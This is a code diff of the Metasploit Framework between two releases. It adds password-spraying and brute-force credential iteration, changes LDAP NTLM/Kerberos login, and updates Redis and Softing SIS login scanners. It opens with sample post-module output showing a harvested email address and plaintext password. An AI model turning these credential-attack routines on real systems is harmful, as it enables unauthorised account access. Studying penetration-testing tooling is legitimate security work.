+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_902434.4
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+
+```

lib/metasploit/framework.rb

@@ -11,7 +11,6 @@ require 'json'
 require 'msgpack'
 require 'metasploit/credential'
 require 'nokogiri'
-require 'packetfu'
 # railties has not autorequire defined
 # rkelly-remix is a fork of rkelly, so it's autorequire is 'rkelly' and not 'rkelly-remix'
 require 'rkelly'

lib/metasploit/framework/credential_collection.rb

@@ -82,6 +82,11 @@ module Metasploit::Framework
       self
     end
 
+    # Combines all the provided credential sources into a stream of {Credential}
+    # objects, yielding them one at a time
+    #
+    # @yieldparam credential [Metasploit::Framework::Credential]
+    # @return [void]
     def each_filtered
       each_unfiltered do |credential|
         next unless self.filter.nil? || self.filter.call(credential)
@@ -108,6 +113,9 @@ module Metasploit::Framework
       if blank_passwords
         yield Metasploit::Framework::Credential.new(private: "", realm: realm, private_type: :password)
       end
+      if nil_passwords
+        yield Metasploit::Framework::Credential.new(private: nil, realm: realm, private_type: :password)
+      end
       if pass_fd
         pass_fd.each_line do |pass_from_file|
           pass_from_file.chomp!
@@ -164,6 +172,13 @@ module Metasploit::Framework
   end
 
   class CredentialCollection < PrivateCredentialCollection
+    # @!attribute password_spray
+    #   Whether password spray is enabled. When true, each password is tried against each username first.
+    #   Otherwise the default bruteforce logic will attempt all passwords against the first user, before
+    #   continuing to the next user
+    #
+    #   @return [Boolean]
+    attr_accessor :password_spray
 
     # @!attribute additional_publics
     #   Additional public values that should be tried
@@ -224,7 +239,155 @@ module Metasploit::Framework
     #
     # @yieldparam credential [Metasploit::Framework::Credential]
     # @return [void]
-    def each_unfiltered
+    def each_filtered
+      if password_spray
+        each_unfiltered_password_first do |credential|
+          next unless self.filter.nil? || self.filter.call(credential)
+
+          yield credential
+        end
+      else
+        each_unfiltered_username_first do |credential|
+          next unless self.filter.nil? || self.filter.call(credential)
+
+          yield credential
+        end
+      end
+    end
+
+    alias each each_filtered
+
+    # When password spraying is enabled, do first passwords then usernames
+    #  i.e.
+    #   username1:password1
+    #   username2:password1
+    #   username3:password1
+    # ...
+    #   username1:password2
+    #   username2:password2
+    #   username3:password2
+    # ...
+    # @yieldparam credential [Metasploit::Framework::Credential]
+    # @return [void]
+    def each_unfiltered_password_first
+      if user_file.present?
+        user_fd = File.open(user_file, 'r:binary')
+      end
+
+      prepended_creds.each { |c| yield c }
+
+      if anonymous_login
+        yield Metasploit::Framework::Credential.new(public: '', private: '', realm: realm, private_type: :password)
+      end
+
+      if password.present?
+        if nil_passwords
+          yield Metasploit::Framework::Credential.new(public: username, private: nil, realm: realm, private_type: :password)
+        end
+        if username.present?
+          yield Metasploit::Framework::Credential.new(public: username, private: password, realm: realm, private_type: private_type(password))
+        end
+        if user_as_pass
+          yield Metasploit::Framework::Credential.new(public: username, private: username, realm: realm, private_type: :password)
+        end
+        if blank_passwords
+          yield Metasploit::Framework::Credential.new(public: username, private: "", realm: realm, private_type: :password)
+        end
+        if user_fd
+          user_fd.each_line do |user_from_file|
+            user_from_file.chomp!
+            yield Metasploit::Framework::Credential.new(public: user_from_file, private: password, realm: realm, private_type: private_type(password))
+          end
+          user_fd.seek(0)
+        end
+      end
+
+      if pass_file.present?
+        File.open(pass_file, 'r:binary') do |pass_fd|
+          pass_fd.each_line do |pass_from_file|
+            pass_from_file.chomp!
+            if username.present?
+              yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm, private_type: :password)
+            end
+            if user_as_pass
+              yield Metasploit::Framework::Credential.new(public: pass_from_file, private: pass_from_file, realm: realm, private_type: :password)
+            end
+            next unless user_fd
+
+            user_fd.each_line do |user_from_file|
+              user_from_file.chomp!
+              yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
+            end
+            user_fd.seek(0)
+          end
+        end
+      end
+
+      if userpass_file.present?
+        File.open(userpass_file, 'r:binary') do |userpass_fd|
+          userpass_fd.each_line do |line|
+            user, pass = line.split(" ", 2)
+            if pass.blank?
+              pass = ''
+            else
+              pass.chomp!
+            end
+            yield Metasploit::Framework::Credential.new(public: user, private: pass, realm: realm)
+          end
+        end
+      end
+
+      additional_privates.each do |add_private|
+        if username.present?
+          yield Metasploit::Framework::Credential.new(public: username, private: add_private, realm: realm, private_type: private_type(add_private))
+        end
+        user_fd.each_line do |user_from_file|
+          user_from_file.chomp!
+          yield Metasploit::Framework::Credential.new(public: user_from_file, private: add_private, realm: realm, private_type: private_type(add_private))
+        end
+        user_fd.seek(0)
+      end
+
+      additional_publics.each do |add_public|
+        if password.present?
+          yield Metasploit::Framework::Credential.new(public: add_public, private: password, realm: realm, private_type: private_type(password) )
+        end
+        if user_as_pass
+          yield Metasploit::Framework::Credential.new(public: add_public, private: user_from_file, realm: realm, private_type: :password)
+        end
+        if blank_passwords
+          yield Metasploit::Framework::Credential.new(public: add_public, private: "", realm: realm, private_type: :password)
+        end
+        if nil_passwords
+          yield Metasploit::Framework::Credential.new(public: add_public, private: nil, realm: realm, private_type: :password)
+        end
+        if user_fd
+          user_fd.each_line do |user_from_file|
+            user_from_file.chomp!
+            yield Metasploit::Framework::Credential.new(public: add_public, private: user_from_file, realm: realm, private_type: private_type(user_from_file))
+          end
+          user_fd.seek(0)
+        end
+        additional_privates.each do |add_private|
+          yield Metasploit::Framework::Credential.new(public: add_public, private: add_private, realm: realm, private_type: private_type(add_private))
+        end
+      end
+    ensure
+      user_fd.close if user_fd && !user_fd.closed?
+    end
+
+    # When password spraying is not enabled, do first usernames then passwords
+    #  i.e.
+    #   username1:password1
+    #   username1:password2
+    #   username1:password3
+    # ...
+    #   username2:password1
+    #   username2:password2
+    #   username2:password3
+    # @yieldparam credential [Metasploit::Framework::Credential]
+    # @return [void]
+    def each_unfiltered_username_first
       if pass_file.present?
         pass_fd = File.open(pass_file, 'r:binary')
       end
@@ -325,7 +488,6 @@ module Metasploit::Framework
           yield Metasploit::Framework::Credential.new(public: add_public, private: add_private, realm: realm, private_type: private_type(add_private))
         end
       end
-
     ensure
       pass_fd.close if pass_fd && !pass_fd.closed?
     end

lib/metasploit/framework/ldap/client.rb

@@ -1,5 +1,7 @@
 # frozen_string_literal: true
 
+require 'rex/proto/ldap/auth_adapter'
+
 module Metasploit
   module Framework
     module LDAP
@@ -24,18 +26,16 @@ module Metasploit
 
           case opts[:ldap_auth]
           when Msf::Exploit::Remote::AuthOption::SCHANNEL
-            raise Msf::ValidationError, 'The SSL option must be enabled when using SCHANNEL authentication.' unless ssl
-
-            connect_opts.merge!(ldap_auth_opts_scahnnel(opts))
+            connect_opts.merge!(ldap_auth_opts_schannel(opts, ssl))
           when Msf::Exploit::Remote::AuthOption::KERBEROS
-            connect_opts.merge!(ldap_auth_opts_kerberos(opts))
+            connect_opts.merge!(ldap_auth_opts_kerberos(opts, ssl))
           when Msf::Exploit::Remote::AuthOption::NTLM
-            connect_opts.merge!(ldap_auth_opts_ntlm(opts))
+            connect_opts.merge!(ldap_auth_opts_ntlm(opts, ssl))
           when Msf::Exploit::Remote::AuthOption::PLAINTEXT
             connect_opts.merge!(ldap_auth_opts_plaintext(opts))
           when Msf::Exploit::Remote::AuthOption::AUTO
             if opts[:username].present? && opts[:domain].present?
-              connect_opts.merge!(ldap_auth_opts_ntlm(opts))
+              connect_opts.merge!(ldap_auth_opts_ntlm(opts, ssl))
             elsif opts[:username].present?
               connect_opts.merge!(ldap_auth_opts_plaintext(opts))
             end
@@ -46,14 +46,15 @@ module Metasploit
 
         private
 
-        def ldap_auth_opts_kerberos(opts)
+        def ldap_auth_opts_kerberos(opts, ssl)
           auth_opts = {}
-          raise Msf::ValidationError, 'The Ldap::Rhostname option is required when using Kerberos authentication.' if opts[:ldap_rhostname].blank?
+          raise Msf::ValidationError, 'The LDAP::Rhostname option is required when using Kerberos authentication.' if opts[:ldap_rhostname].blank?
           raise Msf::ValidationError, 'The DOMAIN option is required when using Kerberos authentication.' if opts[:domain].blank?
 
           offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(opts[:ldap_krb_offered_enc_types])
           raise Msf::ValidationError, 'At least one encryption type is required when using Kerberos authentication.' if offered_etypes.empty?
 
+          sign_and_seal = opts.fetch(:sign_and_seal, !ssl)
           kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
             host: opts[:domain_controller_rhost].blank? ? nil : opts[:domain_controller_rhost],
             hostname: opts[:ldap_rhostname],
@@ -64,58 +65,41 @@ module Metasploit
             framework_module: opts[:framework_module],
             cache_file: opts[:ldap_krb5_cname].blank? ? nil : opts[:ldap_krb5_cname],
             ticket_storage: opts[:kerberos_ticket_storage],
-            offered_etypes: offered_etypes
+            offered_etypes: offered_etypes,
+            mutual_auth: true,
+            use_gss_checksum: sign_and_seal || ssl
           )
 
           auth_opts[:auth] = {
-            method: :sasl,
-            mechanism: 'GSS-SPNEGO',
-            initial_credential: proc do
-              kerberos_result = kerberos_authenticator.authenticate
-              kerberos_result[:security_blob]
-            end,
-            challenge_response: true
+            method: :rex_kerberos,
+            kerberos_authenticator: kerberos_authenticator,
+            sign_and_seal: sign_and_seal
           }
+
           auth_opts
         end
 
-        def ldap_auth_opts_ntlm(opts)
+        def ldap_auth_opts_ntlm(opts, ssl)
           auth_opts = {}
-          ntlm_client = RubySMB::NTLM::Client.new(
-            opts[:username],
-            opts[:password],
-            workstation: 'WORKSTATION',
-            domain: opts[:domain].blank? ? '.' : opts[:domain],
-            flags:
-              RubySMB::NTLM::NEGOTIATE_FLAGS[:UNICODE] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:REQUEST_TARGET] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:NTLM] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:ALWAYS_SIGN] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:EXTENDED_SECURITY] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:KEY_EXCHANGE] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:TARGET_INFO] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:VERSION_INFO]
-          )
-
-          negotiate = proc do |challenge|
-            ntlmssp_offset = challenge.index('NTLMSSP')
-            type2_blob = challenge.slice(ntlmssp_offset..-1)
-            challenge = [type2_blob].pack('m')
-            type3_message = ntlm_client.init_context(challenge)
-            type3_message.serialize
-          end
 
           auth_opts[:auth] = {
-            method: :sasl,
-            mechanism: 'GSS-SPNEGO',
-            initial_credential: ntlm_client.init_context.serialize,
-            challenge_response: negotiate
+            # use the rex one provided by us to support TLS channel binding (see: ruby-ldap/ruby-net-ldap#407) and blank
+            # passwords (see: WinRb/rubyntlm#45)
+            method: :rex_ntlm,
+            username: opts[:username],
+            password: opts[:password],
+            domain: opts[:domain],
+            workstation: 'WORKSTATION',
+            sign_and_seal: opts.fetch(:sign_and_seal, !ssl)
           }
+
           auth_opts
         end
 
         def ldap_auth_opts_plaintext(opts)
           auth_opts = {}
+          raise Msf::ValidationError, 'Can not sign and seal when using Plaintext authentication.' if opts.fetch(:sign_and_seal, false)
+
           auth_opts[:auth] = {
             method: :simple,
             username: opts[:username],
@@ -124,10 +108,12 @@ module Metasploit
           auth_opts
         end
 
-        def ldap_auth_opts_scahnnel(opts)
+        def ldap_auth_opts_schannel(opts, ssl)
           auth_opts = {}
           pfx_path = opts[:ldap_cert_file]
-          raise Msf::ValidationError, 'The LDAP::CertFile option is required when using SCHANNEL authentication.' if pfx_path.blank?
+          raise Msf::ValidationError, 'The SSL option must be enabled when using Schannel authentication.' unless ssl
+          raise Msf::ValidationError, 'The LDAP::CertFile option is required when using Schannel authentication.' if pfx_path.blank?
+          raise Msf::ValidationError, 'Can not sign and seal when using Schannel authentication.' if opts.fetch(:sign_and_seal, false)
 
           unless ::File.file?(pfx_path) && ::File.readable?(pfx_path)
             raise Msf::ValidationError, 'Failed to load the PFX certificate file. The path was not a readable file.'

lib/metasploit/framework/login_scanner/base.rb

@@ -252,7 +252,15 @@ module Metasploit
                 end
               end
             rescue => e
-              elog('Attempt may not yield a result', error: e)
+              if framework_module
+                prefix = framework_module.respond_to?(:peer) ? "#{framework_module.peer} - LOGIN FAILED:" : "LOGIN FAILED:"
+                framework_module.print_warning("#{prefix} #{credential.to_h} - Unhandled error - scan may not produce correct results: #{e.message} - #{e.backtrace}")
+              end
+              elog("Scan Error: #{e.message}", error: e)
+              consecutive_error_count += 1
+              total_error_count += 1
+              break if consecutive_error_count >= 3
+              break if total_error_count >= 10
             end
             nil
           end

lib/metasploit/framework/login_scanner/ldap.rb

@@ -11,8 +11,10 @@ module Metasploit
         include Metasploit::Framework::LDAP::Client
         include Msf::Exploit::Remote::LDAP
 
-        attr_accessor :opts
-        attr_accessor :realm_key
+        attr_accessor :opts, :realm_key
+        # @!attribute use_client_as_proof
+        #   @return [Boolean] If a login is successful and this attribute is true - an LDAP::Client instance is used as proof
+        attr_accessor :use_client_as_proof
 
         def attempt_login(credential)
           result_opts = {
@@ -36,17 +38,24 @@ module Metasploit
           }.merge(@opts)
 
           connect_opts = ldap_connect_opts(host, port, connection_timeout, ssl: opts[:ssl], opts: opts)
-          ldap_open(connect_opts) do |ldap|
-            return status_code(ldap.get_operation_result.table)
+          begin
+            ldap_client = ldap_open(connect_opts, keep_open: true)
+            return status_code(ldap_client)
           rescue StandardError => e
             { status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
           end
         end
 
-        def status_code(operation_result)
-          case operation_result[:code]
+        def status_code(ldap_client)
+          operation_result = ldap_client.get_operation_result.table[:code]
+          case operation_result
           when 0
-            { status: Metasploit::Model::Login::Status::SUCCESSFUL }
+            result = { status: Metasploit::Model::Login::Status::SUCCESSFUL }
+            if use_client_as_proof
+              result[:proof] = ldap_client
+              result[:connection] = ldap_client.socket
+            end
+            result
           else
             { status: Metasploit::Model::Login::Status::INCORRECT, proof: "Bind Result: #{operation_result}" }
           end
@@ -84,7 +93,6 @@ module Metasploit
               credential.public = "#{credential.public}@#{opts[:domain]}"
               yield credential
             end
-
           end
         end
       end

lib/metasploit/framework/login_scanner/redis.rb

@@ -1,6 +1,7 @@
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'
 require 'metasploit/framework/tcp/client'
+require 'rex/proto/redis'
 
 module Metasploit
   module Framework
@@ -9,21 +10,49 @@ module Metasploit
       # This is the LoginScanner class for dealing with REDIS.
       # It is responsible for taking a single target, and a list of credentials
       # and attempting them. It then saves the results.
-
       class Redis
         include Metasploit::Framework::LoginScanner::Base
         include Metasploit::Framework::LoginScanner::RexSocket
         include Metasploit::Framework::Tcp::Client
 
-        DEFAULT_PORT         = 6379
-        LIKELY_PORTS         = [ DEFAULT_PORT ]
-        LIKELY_SERVICE_NAMES = [ 'redis' ]
-        PRIVATE_TYPES        = [ :password ]
-        REALM_KEY            = nil
+        # Required to be able to invoke the scan! method from the included Base module.
+        # We do not use inheritance, so overwriting a method and relying on super does
+        # not work in this case.
+        alias parent_scan! scan!
+
+        DEFAULT_PORT          = 6379
+        LIKELY_PORTS          = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES  = [ 'redis' ]
+        PRIVATE_TYPES         = [ :password ]
+        REALM_KEY             = nil
+
+        # Attempt to login with every {Credential credential} in
+        # {#cred_details}, by calling {#attempt_login} once for each.
+        #
+        # If a successful login is found for a user, no more attempts
+        # will be made for that user. If the scanner detects that no
+        # authentication is required, no further attempts will be made
+        # at all.
+        #
+        # @yieldparam result [Result] The {Result} object for each attempt
+        # @yieldreturn [void]
+        # @return [void]
+        def scan!(&block)
+          first_credential = to_enum(:each_credential).first
+          result = attempt_login(first_credential)
+          result.freeze
+
+          if result.status == Metasploit::Model::Login::Status::NO_AUTH_REQUIRED
+            yield result if block_given?
+          else
+            parent_scan!(&block)
+          end
+        end
 
         # This method can create redis command which can be read by redis server
         def redis_proto(command_parts)
           return if command_parts.blank?
+
           command = "*#{command_parts.length}\r\n"
           command_parts.each do |p|
             command << "$#{p.length}\r\n#{p}\r\n"
@@ -44,46 +73,95 @@ module Metasploit
             service_name: 'redis'
           }
 
-          disconnect if self.sock
+          disconnect if sock
 
           begin
             connect
             select([sock], nil, nil, 0.4)
 
-            command = redis_proto(['AUTH', "#{credential.private}"])
-            sock.put(command)
-            result_options[:proof] = sock.get_once
+            # Skip this call if we're dealing with an older redis version.
+            response = authenticate(credential.public.to_s, credential.private.to_s) unless @older_redis
 
-            # No password      - ( -ERR Client sent AUTH, but no password is set\r\n )
-            # Invalid password - ( -ERR invalid password\r\n )
-            # Valid password   - (+OK\r\n)
-
-            if result_options[:proof] && result_options[:proof] =~ /but no password is set/i
-              result_options[:status] = Metasploit::Model::Login::Status::NO_AUTH_REQUIRED
-            elsif result_options[:proof] && result_options[:proof] =~ /^-ERR invalid password/i
-              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
-            elsif result_options[:proof] && result_options[:proof][/^\+OK/]
-              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+            # If we're dealing with an older redis version or the previous call failed,
+            # try the backwards compatibility call instead.
+            # We also set the @older_redis to true if we haven't as we might be entering this
+            # block from the match response.
+            if @older_redis || (response && response.match(::Rex::Proto::Redis::Base::Constants::WRONG_ARGUMENTS_FOR_AUTH))
+              @older_redis ||= true
+              response = authenticate_pre_v6(credential.private.to_s)
             end
 
+            result_options[:proof] = response
+            result_options[:status] = validate_login(result_options[:proof])
           rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
             result_options.merge!(
               proof: e,
               status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
             )
           end
-          disconnect if self.sock
+
+          disconnect if sock
+
           ::Metasploit::Framework::LoginScanner::Result.new(result_options)
         end
 
         private
 
+        # Authenticates against Redis using the provided credentials arguments.
+        # Takes either a password, or a username and password combination.
+        #
+        # @param [String] username The username to authenticate with, defaults to 'default'
+        # @param [String] password The password to authenticate with.
+        # @return [String] The response from Redis for the AUTH command.
+        def authenticate(username, password)
+          command = redis_proto(['AUTH', username.blank? ? 'default' : username, password])
+          sock.put(command)
+          sock.get_once
+        end
+
+        # Authenticates against Redis using the provided password.
+        # This method is for older Redis instances of backwards compatibility.
+        #
+        # @param [String] password The password to authenticate with.
+        # @return [String] The response from Redis for the AUTH command.
+        def authenticate_pre_v6(password)
+          command = redis_proto(['AUTH', password])
+          sock.put(command)
+          sock.get_once
+        end
+
+        # Validates the login data received from Redis and returns the correct Login status
+        # based upon the contents Redis sent back:
+        #
+        # No password      - ( -ERR Client sent AUTH, but no password is set\r\n )
+        # Invalid password - ( -ERR invalid password\r\n )
+        # Valid password   - (+OK\r\n)
+        def validate_login(data)
+          return if data.nil?
+
+          return Metasploit::Model::Login::Status::NO_AUTH_REQUIRED if no_password_set?(data)
+          return Metasploit::Model::Login::Status::INCORRECT if invalid_password?(data)
+          return Metasploit::Model::Login::Status::SUCCESSFUL if data.match(::Rex::Proto::Redis::Base::Constants::OKAY)
+
+          nil
+        end
+
+        def no_password_set?(data)
+          data.match(::Rex::Proto::Redis::Base::Constants::NO_PASSWORD_SET) ||
+            data.match(::Rex::Proto::Redis::Version6::Constants::NO_PASSWORD_SET)
+        end
+
+        def invalid_password?(data)
+          data.match(::Rex::Proto::Redis::Base::Constants::WRONG_PASSWORD) ||
+            data.match(::Rex::Proto::Redis::Version6::Constants::WRONG_PASSWORD)
+        end
+
         # (see Base#set_sane_defaults)
         def set_sane_defaults
-          self.connection_timeout  ||= 30
-          self.port                ||= DEFAULT_PORT
-          self.max_send_size       ||= 0
-          self.send_delay          ||= 0
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
         end
       end
     end

lib/metasploit/framework/login_scanner/softing_sis.rb

@@ -34,17 +34,13 @@ module Metasploit
           false
         end
 
-        # the actual login method, called by #attempt_login
+        # get the authentication token
         #
-        # @param user [String] The username to try
-        # @param pass [String] The password to try
+        # @param user [String] The username
         # @return [Hash]
         #   * status [Metasploit::Model::Login::Status]
-        #   * proof [String] the HTTP response body
-        def do_login(user, pass)
-          # prep the data needed for login
-          protocol = ssl ? 'https' : 'http'
-          # attempt to get an authentication token
+        #   * proof [String] the authentication token 
+        def get_auth_token(user)
           auth_token_uri = normalize_uri("#{uri}/runtime/core/user/#{user}/authentication-token")
 
           # send the request to get an authentication token
@@ -79,9 +75,43 @@ module Metasploit
             return { status: LOGIN_STATUS::INCORRECT, proof: auth_res.body.to_s }
           end
 
+          { status: LOGIN_STATUS::SUCCESSFUL, proof: auth_token }
+        end
+
+        # generate a signature from the authentication token, username, and password
+        #
+        # @param auth_token [String] The authentication token retrieved by calling get_auth_token
+        # @param user [String] The username
+        # @param pass [String] The password
+        # @return [String] A hexadecimal string representation of the signature
+        def generate_signature(auth_token, user, pass)
+          Digest::MD5.hexdigest(auth_token + pass + auth_token + user + auth_token)
+        end
+
+        # the actual login method, called by #attempt_login
+        #
+        # @param user [String] The username to try
+        # @param pass [String] The password to try
+        # @return [Hash]
+        #   * status [Metasploit::Model::Login::Status]
+        #   * proof [String] the HTTP response body
+        def do_login(user, pass)
+          # prep the data needed for login
+          protocol = ssl ? 'https' : 'http'
+          # attempt to get an authentication token
+          auth_token_res = get_auth_token(user)
+          # get_auth_token always returns a hash - check that status is SUCCESSFUL
+          # if not, just return as it is
+          unless auth_token_res[:status] == LOGIN_STATUS::SUCCESSFUL
+            return auth_token_res
+          end
+
+          # extract the authentication token from the hash
+          auth_token = auth_token_res[:proof]
+          
           login_uri = normalize_uri("#{uri}/runtime/core/user/#{user}/authentication")
           # calculate signature to use when logging in
-          signature = Digest::MD5.hexdigest(auth_token + pass + auth_token + user + auth_token)
+          signature = generate_signature(auth_token, user, pass)
           # GET parameters for login
           vars_get = {
             'Signature' => signature,

lib/metasploit/framework/version.rb

@@ -32,7 +32,7 @@ module Metasploit
         end
       end
 
-      VERSION = "6.4.4"
+      VERSION = "6.4.16"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/base/config.rb

@@ -74,7 +74,8 @@ class Config < Hash
       'PluginDirectory'     => "plugins",
       'DataDirectory'       => "data",
       'LootDirectory'       => "loot",
-      'LocalDirectory'      => "local"
+      'LocalDirectory'      => "local",
+      'HistoriesDirectory'  => "histories"
     }
 
   ##
@@ -97,6 +98,13 @@ class Config < Hash
     self.new.config_directory
   end
 
+  # Returns the histories directory default.
+  #
+  # @return [String] the SQL session histories directory.
+  def self.histories_directory
+    self.new.histories_directory
+  end
+
   # Return the directory that logo files should be loaded from.
   #
   # @return [String] path to the logos directory.
@@ -221,46 +229,18 @@ class Config < Hash
     self.new.smb_session_history
   end
 
-  # Returns the full path to the PostgreSQL session history file.
+  # Returns the full path to the ldap session history file.
   #
   # @return [String] path to the history file.
-  def self.postgresql_session_history
-    self.new.postgresql_session_history
-  end
-
-  # Returns the full path to the PostgreSQL interactive query history file
-  #
-  # @return [String] path to the interactive query history file.
-  def self.postgresql_session_history_interactive
-    self.new.postgresql_session_history_interactive
-  end
-
-  # Returns the full path to the MSSQL session history file.
-  #
-  # @return [String] path to the history file.
-  def self.mssql_session_history
-    self.new.mssql_session_history
-  end
-
-  # Returns the full path to the MSSQL interactive query history file
-  #
-  # @return [String] path to the interactive query history file.
-  def self.mssql_session_history_interactive
-    self.new.mssql_session_history_interactive
-  end
-
-  # Returns the full path to the MySQL session history file.
-  #
-  # @return [String] path to the history file.
-  def self.mysql_session_history
-    self.new.mysql_session_history
+  def self.ldap_session_history
+    self.new.ldap_session_history
   end
 
   # Returns the full path to the MySQL interactive query history file
   #
   # @return [String] path to the interactive query history file.
-  def self.mysql_session_history_interactive
-    self.new.mysql_session_history_interactive
+  def self.history_file_for_session_type(opts)
+    self.new.history_file_for_session_type(opts)
   end
 
   def self.pry_history
@@ -350,6 +330,13 @@ class Config < Hash
     self['ConfigDirectory']
   end
 
+  # Returns the histories directory default.
+  #
+  # @return [String] the SQL session histories directory.
+  def histories_directory
+    config_directory + FileSep + self['HistoriesDirectory']
+  end
+
   # Returns the full path to the configuration file.
   #
   # @return [String] path to the configuration file.
@@ -372,28 +359,28 @@ class Config < Hash
     config_directory + FileSep + "smb_session_history"
   end
 
-  def postgresql_session_history
-    config_directory + FileSep + "postgresql_session_history"
+  def ldap_session_history
+    config_directory + FileSep + "ldap_session_history"
   end
 
-  def postgresql_session_history_interactive
-    postgresql_session_history + "_interactive"
+  def history_options_valid?(opts)
+    return false if (opts[:session_type].nil? || opts[:interactive].nil?)
+
+    true
   end
 
-  def mysql_session_history
-    config_directory + FileSep + "mysql_session_history"
+  def interactive_to_string_map(interactive)
+    # Check for true explicitly rather than just a value that is truthy.
+    interactive == true ? '_interactive' : ''
   end
 
-  def mysql_session_history_interactive
-    mysql_session_history + "_interactive"
-  end
+  def history_file_for_session_type(opts)
+    return nil unless history_options_valid?(opts)
 
-  def mssql_session_history
-    config_directory + FileSep + "mssql_session_history"
-  end
+    session_type_name = opts[:session_type]
+    interactive = interactive_to_string_map(opts[:interactive])
 
-  def mssql_session_history_interactive
-    mssql_session_history + "_interactive"
+    histories_directory + FileSep + "#{session_type_name}_session#{interactive}_history"
   end
 
   def pry_history
@@ -517,6 +504,7 @@ class Config < Hash
     FileUtils.mkdir_p(user_module_directory)
     FileUtils.mkdir_p(user_plugin_directory)
     FileUtils.mkdir_p(user_data_directory)
+    FileUtils.mkdir_p(histories_directory)
   end
 
   # Loads configuration from the supplied file path, or the default one if

lib/msf/base/serializer/readable_text.rb

@@ -569,15 +569,15 @@ class ReadableText
   # @param missing [Boolean] dump only empty required options.
   # @return [String] the string form of the information.
   def self.dump_options(mod, indent = '', missing = false, advanced: false, evasion: false)
-    filtered_options = mod.options.values.select { |opt| opt.advanced? == advanced && opt.evasion? == evasion }
+    filtered_options = mod.options.select { |_name, opt| opt.advanced? == advanced && opt.evasion? == evasion }
 
-    option_groups = mod.options.groups.map { |_name, group| group }.sort_by(&:name)
+    option_groups = mod.options.groups.values.select { |group| group.option_names.any? { |name| filtered_options.keys.include?(name) } }
     options_by_group = option_groups.map do |group|
-      [group, group.option_names.map { |name| mod.options[name] }.compact]
+      [group, group.option_names.map { |name| filtered_options[name] }.compact]
     end.to_h
     grouped_option_names = option_groups.flat_map(&:option_names)
-    remaining_options = filtered_options.reject { |option| grouped_option_names.include?(option.name) }
-    options_grouped_by_conditions = remaining_options.group_by(&:conditions)
+    remaining_options = filtered_options.reject { |_name, option| grouped_option_names.include?(option.name) }
+    options_grouped_by_conditions = remaining_options.values.group_by(&:conditions)
 
     option_tables = []
 
@@ -1061,7 +1061,7 @@ class ReadableText
         persist_list.each do |e|
           handler_ctx = framework.jobs[job_id.to_s].ctx[1]
           if handler_ctx && handler_ctx.respond_to?(:datastore)
-             row[7] = 'true' if e['mod_options']['Options'] == handler_ctx.datastore
+             row[7] = 'true' if e['mod_options']['Options'] == handler_ctx.datastore.to_h
           end
         end
 

lib/msf/base/sessions/ldap.rb

@@ -0,0 +1,142 @@
+# -*- coding: binary -*-
+
+require 'rex/post/ldap'
+
+class Msf::Sessions::LDAP
+  #
+  # This interface supports basic interaction.
+  #
+  include Msf::Session::Basic
+  include Msf::Sessions::Scriptable
+
+  # @return [Rex::Post::LDAP::Ui::Console] The interactive console
+  attr_accessor :console
+  # @return [Rex::Proto::LDAP::Client] The LDAP client
+  attr_accessor :client
+
+  attr_accessor :platform, :arch
+  attr_reader :framework
+
+  # @param[Rex::IO::Stream] rstream
+  # @param [Hash] opts
+  # @option opts [Rex::Proto::LDAP::Client] :client
+  def initialize(rstream, opts = {})
+    @client = opts.fetch(:client)
+    self.console = Rex::Post::LDAP::Ui::Console.new(self)
+    super(rstream, opts)
+  end
+
+  def bootstrap(datastore = {}, handler = nil)
+    session = self
+    session.init_ui(user_input, user_output)
+
+    @info = "LDAP #{datastore['USERNAME']} @ #{@peer_info}"
+  end
+
+  def execute_file(full_path, args)
+    if File.extname(full_path) == '.rb'
+      Rex::Script::Shell.new(self, full_path).run(args)
+    else
+      console.load_resource(full_path)
+    end
+  end
+
+  def process_autoruns(datastore)
+    ['InitialAutoRunScript', 'AutoRunScript'].each do |key|
+      next if datastore[key].nil? || datastore[key].empty?
+
+      args = Shellwords.shellwords(datastore[key])
+      print_status("Session ID #{sid} (#{tunnel_to_s}) processing #{key} '#{datastore[key]}'")
+      execute_script(args.shift, *args)
+    end
+  end
+
+  def type
+    self.class.type
+  end
+
+  # Returns the type of session.
+  #
+  def self.type
+    'ldap'
+  end
+
+  def self.can_cleanup_files
+    false
+  end
+
+  #
+  # Returns the session description.
+  #
+  def desc
+    'LDAP'
+  end
+
+  def address
+    @address ||= client.peerhost
+  end
+
+  def port
+    @port ||= client.peerport
+  end
+
+  ##
+  # :category: Msf::Session::Interactive implementors
+  #
+  # Initializes the console's I/O handles.
+  #
+  def init_ui(input, output)
+    self.user_input = input
+    self.user_output = output
+    console.init_ui(input, output)
+    console.set_log_source(log_source)
+
+    super
+  end
+
+  ##
+  # :category: Msf::Session::Interactive implementors
+  #
+  # Resets the console's I/O handles.
+  #
+  def reset_ui
+    console.unset_log_source
+    console.reset_ui
+  end
+
+  def exit
+    console.stop
+  end
+
+  ##
+  # :category: Msf::Session::Interactive implementors
+  #
+  # Override the basic session interaction to use shell_read and
+  # shell_write instead of operating on rstream directly.
+  def _interact
